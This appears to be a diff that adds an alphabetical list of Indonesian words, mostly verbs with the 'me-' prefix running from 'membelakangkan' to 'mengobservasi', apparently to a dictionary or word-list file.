+membelakangkan
+membelalak
+membelanjai
+membelendung
+membelenggu
+membelenting
+membeli
+membeliak
+membeliakkan
+membelit
+membelitkan
+membelok
+membelokkan
+membelot
+membeludak
+membembam
+membenahi
+membenakan
+membenam
+membenamkan
+membenang
+membenari
+membenarkan
+membencanai
+membenci
+membendung
+membengisi
+membengkak
+membengkalaikan
+membengkok
+membengkokkan
+membenihkan
+membeningkan
+membentak
+membentang
+membentangi
+membentangkan
+membentari
+membentengi
+membentrokkan
+membentuk
+membentur
+membenturkan
+membeo
+memberahikan
+memberaikan
+memberang
+memberangi
+memberangsangkan
+memberangus
+memberanikan
+memberantakkan
+memberantas
+memberati
+memberatkan
+memberedel
+membereskan
+memberhalakan
+memberi
+memberikan
+memberitahukan
+memberitakan
+memberkas
+memberkaskan
+memberkati
+memberlakukan
+memberondong
+memberongsang
+memberongsong
+memberontak
+membersihkan
+membersitkan
+membesar
+membesarkan
+membeset
+membesing
+membestel
+membesut
+membetulkan
+membiak
+membiakkan
+membiarkan
+membias
+membiasakan
+membiayai
+membibit
+membicarakan
+membidas
+membidik
+membidikkan
+membiji
+membilang
+membilas
+membimbangkan
+membimbing
+membina
+membinasakan
+membincangkan
+membingkai
+membingkis
+membingungkan
+membirai
+membisikkan
+membisingkan
+membisu
+membius
+memblokade
+memblokir
+membobol
+membocorkan
+membodohi
+membohongi
+membokong
+membolehkan
+membolongi
+membolos
+memboncengkan
+membonekakan
+membongak
+membongkar
+membopong
+membordir
+memborgol
+membosankan
+membotakkan
+membran
+membuahi
+membuahkan
+membuai
+membual
+membualkan
+membuang
+membuas
+membuat
+membuayai
+membubarkan
+membubuhi
+membubuhkan
+membubuk
+membubung
+membubut
+membudayakan
+membudidayakan
+membuhul
+membujang
+membujuk
+membujur
+membuka
+membukankan
+membukit
+membuktikan
+membukukan
+membulatkan
+membumbui
+membumbung
+membumi
+membuncit
+membungakan
+membungkam
+membungkuk
+membungkukkan
+membungkus
+membungkusi
+membuntang
+membuntangkan
+membuntel
+membuntingi
+membuntukan
+membuntuti
+membunuh
+membunyikan
+memburas
+memburaskan
+memburit
+memburu
+membusuk
+membusukkan
+membusung
+membusungkan
+membusur
+membutir
+membutuhkan
+membuyarkan
+memecah
+memecahkan
+memecal
+memecat
+memecongkan
+memecut
+memedakan
+memedang
+memedi
+memedihkan
+memedulikan
+memegahkan
+memegang
+memegas
+memejahijaukan
+memejalkan
+memejamkan
+memeka
+memekakkan
+memekatkan
+memekik
+memekikkan
+memeleceh
+memelesetkan
+memelet
+memelihara
+memelintir
+memelopori
+memelotot
+memelototi
+memeluk
+memenangi
+memenangkan
+memenatkan
+memencar
+memencarkan
+memencilkan
+memencongkan
+memendek
+memendekkan
+memengapkan
+memengaruhi
+memenggal
+memengkalkan
+memengkis
+memenjara
+mementahkan
+mementangkan
+mementaskan
+mementingkan
+mementung
+memenuhi
+memenungkan
+memepas
+memepat
+memepet
+memerai
+memeram
+memerangi
+memerangkap
+memerankan
+memeras
+memerawani
+memerban
+memercayai
+memercayakan
+memercik
+memerciki
+memercikkan
+memerdekakan
+memeriahkan
+memerihkan
+memerikan
+memeriksa
+memerintah
+memerintahkan
+memerkarakan
+memerkosa
+memerlukan
+memernis
+memerosokkan
+memertal
+memesan
+memesona
+memesonakan
+memesong
+memestakan
+memestikan
+memesumi
+memetakan
+memetik
+memfardukan
+memfasilitasi
+memfatwakan
+memfilmkan
+memfilter
+memfirmankan
+memfitnah
+memfokuskan
+memformulasikan
+memforsir
+memfoto
+memiara
+memicakan
+memicing
+memicu
+memidana
+memihak
+memijak
+memijakkan
+memijit
+memikat
+memikirkan
+memikul
+memilih
+memiliki
+memilin
+memilukan
+memimpikan
+memimpin
+meminati
+memindahkan
+memindai
+meminggir
+meminggirkan
+memingit
+meminta
+memintal
+memintas
+memintasi
+meminum
+memipihkan
+memiringkan
+memisah
+memisahkan
+memisalkan
+memitar
+memiting
+memitoskan
+memo
+memoar
+memobilisasi
+memodali
+memodernkan
+memohon
+memojok
+memojokkan
+memolakan
+memomokkan
+memoncongkan
+memondok
+memongahi
+memonitor
+memonten
+memopulerkan
+memorakporandakan
+memorandum
+memori
+memorot
+memotivasi
+memotong
+memotori
+memotret
+mempan
+memparafrasekan
+mempelai
+mempelajari
+mempelam
+memper
+memperadabkan
+memperadik
+memperagakan
+memperagungkan
+memperakukan
+memperalat
+memperamat
+memperantarai
+memperapat
+memperapikan
+memperapitkan
+memperbagus
+memperbaiki
+memperbalahkan
+memperbanyak
+memperbarui
+memperbedakan
+memperbuat
+memperbudak
+mempercakapkan
+mempercantik
+mempercekakkan
+mempercepat
+memperdagangkan
+memperdaya
+memperdayai
+memperdekatkan
+memperdengarkan
+memperdua
+memperedarkan
+mempererat
+mempergelarkan
+mempergilirkan
+memperhadapkan
+memperhambakan
+memperhebat
+memperhitungkan
+memperindah
+memperingati
+memperingatkan
+memperjuangkan
+memperkatakan
+memperkaya
+memperkenalkan
+memperkenankan
+memperkencang
+memperkerap
+memperkeras
+memperkerjakan
+memperkeruh
+memperkirakan
+memperkuat
+memperkuda
+memperlagakan
+memperlakukan
+memperlalaikan
+memperlambat
+memperlawankan
+memperlihatkan
+memperlombakan
+mempermainkan
+mempermalukan
+mempermandikan
+memperolahkan
+memperoleh
+memperolok
+memperpanjang
+mempersaksikan
+mempersatukan
+mempersekutukan
+memperselisihkan
+mempersembahkan
+mempersendakan
+mempersengketakan
+mempersering
+mempersetan
+mempersiapkan
+mempersingkat
+mempersoalkan
+mempersuakan
+mempersuatukan
+mempersunting
+mempertahankan
+mempertalikan
+mempertandingkan
+mempertanggungkan
+mempertanyakan
+mempertaruhkan
+mempertarungkan
+mempertautkan
+mempertembungkan
+mempertemukan
+mempertenggangkan
+mempertentangkan
+mempertikaikan
+mempertimbangkan
+mempertontonkan
+mempertuan
+mempertunangkan
+mempertunjukkan
+memperturutkan
+memperumahkan
+memperuntukkan
+memprakarsai
+mempraktikkan
+memprediksi
+mempresentasikan
+mempreteli
+mempribumikan
+memprihatinkan
+memprioritaskan
+memproduksi
+mempromosikan
+mempropagandakan
+memproses
+memprotes
+memprovokasi
+memproyeksikan
+mempunyai
+memuakkan
+memuaskan
+memuat
+memuati
+memuatkan
+memublikasikan
+memudahkan
+memudar
+memudarkan
+memufakati
+memugas
+memuja
+memukal
+memukat
+memukau
+memukul
+memukulkan
+memulai
+memulangi
+memulas
+memulaukan
+memuliakan
+memulihkan
+memulung
+memulur
+memuluskan
+memulut
+memumpun
+memunahkan
+memuncak
+memunculkan
+memundurkan
+memunggungi
+memungkari
+memungkinkan
+memungkiri
+memungkirkan
+memunguti
+memunjungi
+memuntahkan
+memuntal
+memuntir
+memuntungkan
+memupuk
+memupuri
+memupuskan
+memurnikan
+memusar
+memusatkan
+memusing
+memusingkan
+memusnahkan
+memustaidkan
+memusuhi
+memusut
+memusyawarahkan
+memutar
+memutarbalikkan
+memutari
+memutasikan
+memutihkan
+memutilasi
+memutus
+memutuskan
+memverifikasi
+memveto
+memvideokan
+memvisualkan
+memvonis
+menaati
+menabahkan
+menabalkan
+menabir
+menabok
+menabrak
+menabrakkan
+menabu
+menabuh
+menabukan
+menabun
+menabung
+menaburi
+menaburkan
+menadah
+menadbirkan
+menafahus
+menafakurkan
+menafikan
+menafsirkan
+menagak
+menagih
+menahan
+menahaskan
+menahbiskan
+menahkikkan
+menahun
+menaik
+menaiki
+menaikkan
+menaja
+menajak
+menajam
+menajamkan
+menajuk
+menak
+menakali
+menakar
+menakdirkan
+menakhlikkan
+menakhodai
+menakhtakan
+menakik
+menakjubkan
+menaklukkan
+menakrifkan
+menaksir
+menakuk
+menakuti
+menakutkan
+menakzimkan
+menala
+menalak
+menalamkan
+menalikan
+menamai
+menamakan
+menamatkan
+menambah
+menambahi
+menambahkan
+menambak
+menambal
+menambang
+menambat
+menambatkan
+menambun
+menambunkan
+menampak
+menampakkan
+menampang
+menampar
+menampi
+menampik
+menampilkan
+menampung
+menamsilkan
+menanak
+menanam
+menanamkan
+menanap
+menancang
+menancap
+menancapkan
+menandai
+menandakan
+menandangi
+menandaskan
+menandatangani
+menanding
+menandingi
+menandu
+menanduk
+menang
+menangani
+menangas
+menanggalkan
+menanggang
+menanggapi
+menangguhkan
+menangis
+menangisi
+menangkap
+menangkarkan
+menangkis
+menangkup
+menangkupkan
+menanjak
+menantang
+menanti
+menanya
+menanyai
+menanyakan
+menapak
+menapaki
+menapakkan
+menapis
+menapuk
+menara
+menarafkan
+menargetkan
+menari
+menarik
+menarikhkan
+menaris
+menaruh
+menarung
+menarungkan
+menasdikkan
+menasihati
+menasyrihkan
+menata
+menatah
+menataki
+menatang
+menatangkan
+menatap
+menato
+menaungi
+menauri
+menautkan
+menawar
+menawari
+menawarkan
+menayangkan
+mencabik
+mencabuli
+mencabut
+mencabuti
+mencabutkan
+mencacah
+mencacak
+mencacakkan
+mencacap
+mencacapi
+mencacat
+mencacati
+mencacau
+mencaci
+mencaduk
+mencagak
+mencagar
+mencagarkan
+mencagut
+mencahayai
+mencahayakan
+mencair
+mencairkan
+mencak
+mencakar
+mencakup
+mencalak
+mencalang
+mencalar
+mencalarkan
+mencalit
+mencalitkan
+mencalonkan
+mencambuk
+mencampak
+mencampakkan
+mencampung
+mencampur
+mencampuradukkan
+mencampuri
+mencampurkan
+mencamuk
+mencamurkan
+mencanai
+mencanak
+mencanangkan
+mencandu
+mencangah
+mencangam
+mencangkokkan
+mencangkul
+mencangkum
+mencangkung
+mencantol
+mencantolkan
+mencantuk
+mencantumkan
+mencapai
+mencapak
+mencapit
+mencaplok
+mencarah
+mencari
+mencarik
+mencarikan
+mencaring
+mencarter
+mencaruk
+mencatat
+mencatatkan
+mencatek
+mencatu
+mencatut
+mencawiskan
+mencebak
+mencebik
+mencebikkan
+mencebir
+mencebur
+menceburkan
+mencecah
+mencecahkan
+mencecak
+mencecap
+mencecar
+mencecerkan
+mencederai
+mencedok
+mencegah
+mencegat
+mencekah
+mencekal
+mencekam
+mencekau
+menceker
+mencekik
+mencekit
+mencekoki
+menceku
+mencekuh
+mencekup
+mencekut
+mencela
+mencelah
+mencelak
+mencelakakan
+mencelampakkan
+mencelang
+mencelat
+mencelengi
+menceletuk
+mencelikkan
+mencelis
+menceluk
+mencelupkan
+mencemari
+mencemarkan
+mencemaskan
+mencemooh
+mencemplung
+mencemplungkan
+mencempung
+mencemuk
+mencencang
+menceng
+mencengam
+mencengangkan
+mencengap
+mencengkam
+mencengkau
+mencengkelong
+mencengkeram
+mencentong
+mencepol
+mencerabih
+menceracam
+menceracau
+mencerahkan
+menceraiberaikan
+menceraikan
+menceramahkan
+mencerap
+mencerat
+mencerataikan
+mencerca
+menceret
+menceriakan
+menceritakan
+mencerkau
+mencerling
+mencermati
+mencermatkan
+mencerminkan
+mencerna
+mencernakan
+menceroboh
+mencerobohi
+mencerocos
+menceruh
+mencerup
+mencerut
+mencetak
+mencetekkan
+mencetuskan
+mencibir
+mencicik
+mencicil
+mencicip
+mencicipi
+menciduk
+mencilok
+mencincang
+mencintai
+menciprat
+menciprati
+mencipratkan
+menciptakan
+mencirit
+mencitrakan
+mencium
+menciut
+mencle
+menclok
+mencoaki
+mencoang
+mencoba
+mencoblos
+mencobloskan
+mencocok
+mencocokkan
+mencocol
+mencodak
+mencokok
+mencolek
+mencolok
+mencolong
+mencomeli
+mencomot
+mencondongkan
+mencong
+mencongak
+mencongkel
+mencongkong
+mencongol
+mencontek
+menconteng
+mencontoh
+mencontohi
+mencontohkan
+mencopet
+mencopot
+mencopoti
+mencorakkan
+mencoreng
+mencoret
+mencorong
+mencorot
+mencotok
+mencuaikan
+mencuat
+mencubit
+mencuca
+mencuci
+mencucuh
+mencucuk
+mencucukkan
+mencucup
+mencucuri
+mencucurkan
+mencucut
+mencugat
+mencuil
+mencukil
+mencukongi
+mencukupi
+mencukupkan
+mencukur
+menculak
+menculik
+mencumbu
+mencundangi
+mencungkil
+mencuplik
+mencura
+mencurah
+mencurahi
+mencurahkan
+mencuraikan
+mencuram
+mencurangi
+mencurat
+mencuri
+mencurigai
+mencurigakan
+mendabik
+mendacin
+mendada
+mendadak
+mendaftar
+mendaftarkan
+mendagang
+mendagel
+mendahagakan
+mendahsyat
+mendahsyatkan
+mendahului
+mendahulukan
+mendaifkan
+mendak
+mendaki
+mendakwa
+mendakwahkan
+mendakyahkan
+mendalam
+mendalami
+mendalangi
+mendalangkan
+mendalilkan
+mendamaikan
+mendamari
+mendambakan
+mendamik
+mendampak
+mendampar
+mendamparkan
+mendampilkan
+mendampingi
+mendampingkan
+mendamprat
+mendanai
+mendandani
+mendangkung
+mendapat
+mendapati
+mendapatkan
+mendarah
+mendaras
+mendarat
+mendaratkan
+mendarkan
+mendarmabaktikan
+mendasar
+mendasari
+mendasarkan
+mendata
+mendatang
+mendatangi
+mendatangkan
+mendatar
+mendatarkan
+mendaulat
+mendayagunakan
+mendayung
+mendebah
+mendebarkan
+mendebat
+mendebatkan
+mendebik
+mendebitkan
+mendedahkan
+mendedel
+mendedikasikan
+mendefinisikan
+mendegil
+mendeham
+mendekam
+mendekap
+mendekat
+mendekati
+mendekatkan
+mendeklamasi
+mendekorasi
+mendekut
+mendelegasikan
+mendelik
+mendelongop
+mendemik
+mendemonstrasikan
+mendempet
+mendempetkan
+mendenda
+mendendam
+mendendangkan
+mendengar
+mendengarkan
+mendenging
+mendengki
+mendengking
+mendengkul
+mendengkur
+mendengung
+mendengungkan
+mendengus
+mendenyutkan
+mendepak
+mendepang
+mendeportasi
+mendera
+menderes
+menderetkan
+menderita
+menderma
+mendermakan
+mendesah
+mendesain
+mendesak
+mendesakkan
+mendesing
+mendesir
+mendesis
+mendeskripsikan
+mendetail
+mendeteksi
+mendewakan
+mendewasakan
+mendiami
+mendiamkan
+mendiang
+mendidih
+mendidihkan
+mendidik
+mendikai
+mendikte
+mendiktekan
+mendilak
+mendindingi
+mending
+mendinginkan
+mendira
+mendirikan
+mendiskusikan
+mendistribusikan
+mendoakan
+mendobrak
+mendoktrin
+mendokumentasikan
+mendominasi
+mendomplengkan
+mendonan
+mendondangkan
+mendong
+mendongak
+mendongakkan
+mendongeng
+mendongengkan
+mendongkel
+mendongkolkan
+mendongkrak
+mendongsok
+mendorong
+mendramatisasi
+mendua
+menduakan
+menduduki
+mendudukkan
+menduga
+mendukacitakan
+mendukung
+mendukuni
+mendulang
+mendung
+mendungukan
+mendupai
+mendupak
+mendurhakai
+menduri
+mendustai
+menebak
+menebal
+menebalkan
+menebang
+menebar
+menebarkan
+menebas
+menebaskan
+menebat
+menebeng
+menebuk
+meneduhi
+meneduhkan
+menegah
+menegakkan
+menegang
+menegangkan
+menegapkan
+menegarkan
+menegasikan
+menegaskan
+menegosiasikan
+meneguhkan
+meneguk
+menegur
+menekadkan
+menekan
+menekankan
+menekuk
+menekuni
+menelaah
+meneladan
+meneladani
+menelah
+menelangkup
+menelanjangi
+menelantarkan
+meneledorkan
+menelik
+meneliti
+meneluh
+menelurkan
+menelusuri
+menemani
+menembak
+menembaki
+menembakkan
+menemberang
+menembuk
+menembus
+menembusi
+menembuskan
+menempa
+menempah
+menempati
+menempatkan
+menempelak
+menempeleng
+menempelkan
+menempikkan
+menempohkan
+menempuh
+menempur
+menemui
+menemukan
+menenangkan
+menenarkan
+menendang
+menengah
+menengahi
+menengarai
+menenggak
+menenggala
+menenggang
+menenggekkan
+menenggelami
+menenggelamkan
+menengkar
+menengkarapkan
+menengkari
+menengkarkan
+menengkel
+menengkurap
+menengok
+menentang
+menentangkan
+menenteramkan
+menentu
+menentukan
+menenun
+menenung
+menepak
+menepati
+menepatkan
+menepi
+menepik
+menepikan
+menepuk
+menepung
+menera
+menerakan
+menerangi
+menerangkan
+menerapkan
+menerawang
+menerbangkan
+menerbankan
+menerbitkan
+meneriakkan
+menerikkan
+menerima
+menerimakan
+menerjang
+menerjuni
+menerjunkan
+menerka
+menernakkan
+meneropong
+meneror
+menertawai
+menertawakan
+menertibkan
+menerungku
+menerus
+meneruskan
+menetakkan
+menetap
+menetapi
+menetapkan
+menetas
+menetaskan
+menetes
+meneteskan
+menewaskan
+mengabadikan
+mengabah
+mengabahkan
+mengabaikan
+mengabari
+mengabarkan
+mengabdi
+mengaben
+mengabir
+mengabjadkan
+mengabolisi
+mengabsahkan
+mengabu
+mengabui
+mengabuk
+mengabukan
+mengabulkan
+mengabung
+mengabur
+mengaburkan
+mengacak
+mengacapkan
+mengacara
+mengacarakan
+mengacau
+mengacaubalaukan
+mengacaukan
+mengacip
+mengacir
+mengacu
+mengacuhkan
+mengacukan
+mengacung
+mengacungkan
+mengadabi
+mengadakan
+mengadang
+mengadaptasi
+mengadat
+mengadatkan
+mengadili
+mengadon
+mengadopsi
+mengadreskan
+mengadu
+mengaduk
+mengadukan
+mengagakkan
+mengagendakan
+mengagetkan
+mengagumi
+mengagumkan
+mengagunkan
+mengah
+mengahlikan
+mengaibkan
+mengail
+mengairi
+mengais
+mengait
+mengaitkan
+mengajaibkan
+mengajak
+mengajakkan
+mengajar
+mengaji
+mengajuk
+mengajukan
+mengakak
+mengakali
+mengakan
+mengakankan
+mengakap
+mengakar
+mengakas
+mengakhiri
+mengakhirkan
+mengakibatkan
+mengakomodasi
+mengakrabkan
+mengaktifkan
+mengaktualkan
+mengaku
+mengakui
+mengakuri
+mengakurkan
+mengalah
+mengalahkan
+mengalai
+mengalamatkan
+mengalami
+mengalas
+mengalaskan
+mengalem
+mengalicau
+mengalih
+mengalihbahasakan
+mengalihkan
+mengalihtugaskan
+mengalikan
+mengalir
+mengalirkan
+mengalit
+mengalkulasi
+mengalokasikan
+mengalpakan
+mengalun
+mengalungkan
+mengalunkan
+mengalutkan
+mengamalkan
+mengamanahkan
+mengamanatkan
+mengamankan
+mengamati
+mengambang
+mengambau
+mengambek
+mengambil
+mengambinghitamkan
+mengamini
+mengaminkan
+mengampai
+mengampaikan
+mengampu
+mengampukan
+mengampuni
+mengampunkan
+mengamputasi
+mengamuk
+menganakemaskan
+menganalisis
+menganalogikan
+mengancam
+mengancang
+mengancing
+mengandaikan
+mengandalkan
+mengandaskan
+mengandung
+menganehkan
+mengangah
+menganggap
+mengangguk
+menganggur
+menganggut
+mengangkang
+mengangkangi
+mengangkasa
+mengangkat
+mengangkatkan
+mengangkup
+mengangkut
+mengangon
+mengangsur
+menganiaya
+menganjak
+menganjakkan
+menganjur
+menganjuri
+menganjurkan
+mengantar
+mengantarai
+mengantih
+mengantongi
+mengantuk
+mengantukkan
+mengantup
+menganugerahi
+menganugerahkan
+menganulir
+menganut
+menganyam
+mengap
+mengapa
+mengapalkan
+mengapikkan
+mengapit
+mengapkir
+mengaplikasikan
+mengapung
+mengapungkan
+mengarah
+mengarahkan
+mengarak
+mengaralkan
+mengaram
+mengaramkan
+mengarang
+mengaras
+mengarau
+mengaret
+mengarifi
+mengarih
+mengarsip
+mengartikan
+mengartikulasikan
+mengaru
+mengarungi
+mengaruniai
+mengarut
+mengaryakan
+mengasa
+mengasah
+mengasakan
+mengasam
+mengasari
+mengasaskan
+mengasese
+mengasihi
+mengasihkan
+mengasim
+mengasingkan
+mengaso
+mengasongkan
+mengasosiasikan
+mengastrasi
+mengasuh
+mengasumsikan
+mengasyiki
+mengasyikkan
+mengatak
+mengatakan
+mengatapel
+mengatapi
+mengatas
+mengatasi
+mengategorikan
+mengateki
+mengatup
+mengatupkan
+mengatur
+mengaur
+mengaut
+mengawal
+mengawali
+mengawalkan
+mengawan
+mengawang
+mengawani
+mengawasi
+mengawat
+mengawetkan
+mengawini
+mengawur
+mengayak
+mengayakan
+mengayau
+mengayomi
+mengayuh
+mengayuhkan
+mengayun
+mengayunkan
+mengazab
+mengazabkan
+mengebaskan
+mengebat
+mengebatkan
+mengebiri
+mengebon
+mengebor
+mengebumikan
+mengebut
+mengecam
+mengecamkan
+mengecap
+mengecas
+mengecat
+mengecek
+mengeceng
+mengecer
+mengecil
+mengecilkan
+mengecoh
+mengecualikan
+mengedangkan
+mengedar
+mengedari
+mengedau
+mengedepankan
+mengedipkan
+mengedit
+mengedraf
+mengedril
+mengedrop
+mengeduk
+mengedut
+mengefektifkan
+mengefisienkan
+mengegolkan
+mengeja
+mengejan
+mengejang
+mengejap
+mengejapkan
+mengejar
+mengejawantahkan
+mengejek
+mengejut
+mengejutkan
+mengekah
+mengekang
+mengeker
+mengekor
+mengeksploitasi
+mengeksplorasi
+mengekspos
+mengekspresikan
+mengelabang
+mengelaborasi
+mengelabui
+mengelak
+mengelakkan
+mengelamkan
+mengelana
+mengelantang
+mengelap
+mengelapkan
+mengelar
+mengelaskan
+mengelebukan
+mengelek
+mengelem
+mengelih
+mengelik
+mengelilingi
+mengelilingkan
+mengelim
+mengelirukan
+mengelit
+mengelokkan
+mengelola
+mengelompokkan
+mengeloskan
+mengeluani
+mengeluarkan
+mengeluh
+mengelukkan
+mengelumuni
+mengelupas
+mengelupaskan
+mengelupur
+mengemas
+mengemasi
+mengemaskan
+mengembalikan
+mengembang
+mengembangbiakkan
+mengembangkan
+mengembara
+mengembat
+mengembung
+mengembungkan
+mengembur
+mengemis
+mengemong
+mengempa
+mengempang
+mengempis
+mengemplang
+mengemu
+mengemudikan
+mengemuka
+mengemukakan
+mengemut
+mengenai
+mengenakan
+mengenakkan
+mengenal
+mengenali
+mengenang
+mengenangkan
+mengenaskan
+mengencangkan
+mengencerkan
+mengencongkan
+mengendalakan
+mengendalikan
+mengendanai
+mengendap
+mengendapkan
+mengendarai
+mengendur
+mengendurkan
+mengendus
+mengentak
+mengental
+mengentalkan
+mengenyahkan
+mengenyam
+mengenyangkan
+mengenyut
+mengepak
+mengepal
+mengepalai
+mengepang
+mengepas
+mengeper
+mengepit
+mengeplak
+mengepres
+mengepris
+mengepung
+mengerabit
+mengerahkan
+mengerakah
+mengeram
+mengeramkan
+mengerang
+mengerangkeng
+mengeras
+mengerasi
+mengeraskan
+mengerat
+mengeratkan
+mengerawang
+mengerbuk
+mengercingkan
+mengercitkan
+mengeremus
+mengerepas
+mengereseng
+mengeriap
+mengering
+mengeringkan
+mengerip
+mengeritkan
+mengerjakan
+mengerkah
+mengerling
+mengernyih
+mengernyit
+mengernyitkan
+mengerok
+mengerosong
+mengersik
+mengertakkan
+mengerti
+mengerubungi
+mengerubuti
+mengerucut
+mengerudungi
+mengeruh
+mengeruhkan
+mengeruk
+mengerumit
+mengerumukkan
+mengerumuni
+mengerut
+mengerutak
+mengerutkan
+mengesah
+mengesahkan
+mengesak
+mengesampingkan
+mengesan
+mengesankan
+mengesat
+mengeset
+mengesir
+mengesun
+mengesup
+mengetahui
+mengetam
+mengetanahkan
+mengetatkan
+mengeteng
+mengetengahkan
+mengetepikan
+mengetes
+mengetis
+mengetren
+mengetuai
+mengetuk
+mengevakuasi
+mengevaluasi
+mengga
+menggabungkan
+menggado
+menggaet
+menggagahi
+menggagalkan
+menggagas
+menggagunkan
+menggairahkan
+menggaji
+menggal
+menggalang
+menggalangi
+menggalau
+menggali
+menggambar
+menggambarkan
+menggamit
+menggampar
+menggandakan
+menggandar
+menggandeng
+menggandul
+mengganduli
+mengganggu
+mengganjal
+mengganjar
+mengganti
+menggantung
+menggantungkan
+mengganyang
+menggapai
+menggaplok
+menggarami
+menggarap
+menggaris
+menggarisbawahi
+menggariskan
+menggarit
+menggarong
+menggaru
+menggaruk
+menggasak
+menggaul
+menggauli
+menggaulkan
+menggayem
+menggayung
+menggayuti
+menggayutkan
+menggeblak
+menggebok
+menggebos
+menggebrak
+menggebu
+menggebuk
+menggebyur
+menggecek
+menggedor
+menggegar
+menggegarkan
+menggegas
+menggegerkan
+menggelandang
+menggelantang
+menggelantung
+menggelap
+menggelapkan
+menggelar
+menggeleber
+menggeledah
+menggeledek
+menggeledur
+menggelegak
+menggelegar
+menggelekek
+menggelembung
+menggelembungkan
+menggelendong
+menggelenyar
+menggelepar
+menggelepek
+menggeleser
+menggelesot
+menggeletak
+menggeletakkan
+menggeletar
+menggeletuk
+menggeliat
+menggelikan
+menggelimpang
+menggelincir
+menggelinding
+menggelindingkan
+menggelinjang
+menggelintar
+menggelinting
+menggelisahi
+menggelisahkan
+menggelitik
+menggelogok
+menggelombang
+menggelongsor
+menggelontor
+menggelopak
+menggelora
+menggelorakan
+menggelundung
+menggelundungkan
+menggelung
+menggeluti
+menggemakan
+menggemari
+menggemaskan
+menggembala
+menggembirakan
+menggembleng
+menggembol
+menggempakan
+menggemparkan
+menggempur
+menggemukkan
+menggemuruh
+menggenang
+menggenangi
+menggenapi
+menggencet
+menggendong
+menggenggam
+menggentari
+menggentarkan
+menggerai
+menggeraikan
+menggerakkan
+menggeram
+menggeramus
+menggeratkan
+menggerayang
+menggerebek
+menggerecoki
+menggerepe
+menggergaji
+menggeriap
+menggerinda
+menggerinyau
+menggerlap
+menggerlip
+menggermut
+menggerogot
+menggerogoti
+menggerojok
+menggerombol
+menggeronyot
+menggeropyok
+menggertak
+menggertakkan
+menggeru
+menggerumit
+menggerundel
+menggerupis
+menggerus
+menggerutu
+menggesakan
+menggesek
+menggeser
+menggetah
+menggetik
+menggetil
+menggetok
+menggigil
+menggigit
+menggila
+menggilapkan
+menggilas
+menggili
+menggiling
+menggilir
+menggiring
+menggisil
+menggiurkan
+menggocoh
+menggoda
+menggodam
+menggodok
+menggodot
+menggojlok
+menggolok
+menggolongkan
+menggoncang
+menggondokkan
+menggondol
+menggonggokkan
+menggonggong
+menggonjak
+menggonjokkan
+menggonyoh
+menggores
+menggoreskan
+menggorok
+menggosipkan
+menggosok
+menggotes
+menggotong
+menggoyak
+menggoyang
+menggubah
+menggubris
+menggudangkan
+menggugah
+menggugat
+mengguling
+menggulingkan
+menggulung
+menggumpal
+menggumpalkan
+menggunakan
+menggundahkan
+menggunduli
+menggunjing
+menggunjingkan
+menggunting
+mengguntur
+menggunung
+menggurah
+menggurat
+mengguratkan
+mengguraukan
+menggurdi
+mengguruh
+menggurui
+menggusari
+menggusta
+menggusur
+menggutik
+mengguyur
+menghabisi
+menghabiskan
+menghadang
+menghadap
+menghadapi
+menghadapkan
+menghadiahi
+menghadiahkan
+menghadiri
+menghadkan
+menghafalkan
+menghajar
+menghajatkan
+menghaki
+menghakimi
+menghalalkan
+menghalang
+menghalangi
+menghalau
+menghaluankan
+menghalusi
+menghaluskan
+menghamba
+menghambakan
+menghambat
+menghambur
+menghamburkan
+menghamili
+menghampar
+menghampari
+menghamparkan
+menghampiri
+menghampirkan
+menghancurkan
+menghangat
+menghangatkan
+menghangitkan
+menghanguskan
+menghantam
+menghantamkan
+menghantarkan
+menghantui
+menghanyutkan
+menghapus
+menghapuskan
+mengharamkan
+mengharapkan
+menghardik
+menghargai
+mengharmoniskan
+mengharu
+mengharukan
+mengharum
+mengharumkan
+mengharuskan
+menghasilkan
+menghasut
+menghayati
+menghebat
+menghebohkan
+menghemat
+menghembus
+menghembuskan
+menghempas
+menghempaskan
+menghendaki
+mengheningkan
+mengherani
+mengherankan
+mengherdik
+menghias
+menghibahkan
+menghibur
+menghidangkan
+menghidupi
+menghidupkan
+menghijrah
+menghikayatkan
+menghilang
+menghimbau
+menghimpun
+menghindar
+menghindari
+menghinggakan
+menghinggapi
+menghipnosis
+menghirukkan
+menghirup
+menghisab
+menghisap
+menghitam
+menghitamkan
+menghitung
+menghormat
+menghormati
+menghubungi
+menghubungkan
+menghujani
+menghujat
+menghukum
+menghulukan
+menghuni
+menghunjam
+menghunjamkan
+menghunus
+menghutankan
+mengi
+mengiakan
+mengiang
+mengias
+mengiaskan
+mengibakan
+mengibaratkan
+mengibarkan
+mengibas
+mengibing
+mengibrit
+mengibuli
+mengidap
+mengidas
+mengidentifikasi
+mengigal
+mengigau
+mengigaukan
+mengijabkan
+mengijmalkan
+mengikat
+mengikatkan
+mengikhlaskan
+mengikhtiarkan
+mengikhtisarkan
+mengikir
+mengikis
+mengiklankan
+mengikrarkan
+mengikuti
+mengikutkan
+mengikutsertakan
+mengilang
+mengilapkan
+mengilat
+mengilatkan
+mengiler
+mengili
+mengilir
+mengimak
+mengimani
+mengimbangkan
+mengimbas
+mengimbau
+mengimbit
+mengimbuhi
+mengimbuhkan
+mengimlakan
+mengimpal
+mengimpikan
+mengimpit
+mengimpitkan
+mengimplementasikan
+mengimplikasikan
+mengimpor
+menginang
+menginap
+menginapkan
+mengincah
+mengincar
+mengincau
+mengincit
+mengincitkan
+mengindikasikan
+mengindoktrinasi
+mengindra
+mengingat
+mengingini
+menginginkan
+mengingkari
+menginisiasikan
+menginjak
+menginjakkan
+menginjeksi
+menginsafi
+menginsafkan
+menginsinuasi
+menginstruksikan
+mengintai
+mengintegrasikan
+mengintensifkan
+menginternir
+menginterogasi
+menginterpretasikan
+menginterupsi
+menginterviu
+mengintil
+mengintimidasi
+mengintip
+menginvasi
+menginventarisasikan
+menginvestasikan
+menginvestigasi
+mengipasi
+mengiprat
+mengiprati
+mengipuk
+mengira
+mengirai
+mengiraikan
+mengirap
+mengiras
+mengirik
+mengirikan
+mengirim
+mengirimkan
+mengiringi
+mengiris
+mengirit
+mengisahkan
+mengisai
+mengisarkan
+mengisbatkan
+mengisi
+mengisikkan
+mengisolasi
+mengistiadatkan
+mengistilahkan
+mengistimewakan
+mengistirahatkan
+mengisyaratkan
+mengitar
+mengitari
+mengitarkan
+mengiyakan
+mengizinkan
+mengkaji
+mengkal
+mengkali
+mengkhawatirkan
+mengkhianati
+mengkhitan
+mengkhitankan
+mengkhusus
+mengkhususkan
+mengklaim
+mengklarifikasi
+mengklasifikasi
+mengkonfrontasikan
+mengkonkretkan
+mengkristal
+mengkritik
+mengkucing
+mengkudu
+mengkup
+mengobarkan
+mengobati
+mengobor
+mengobori
+mengobrolkan
+mengobservasi
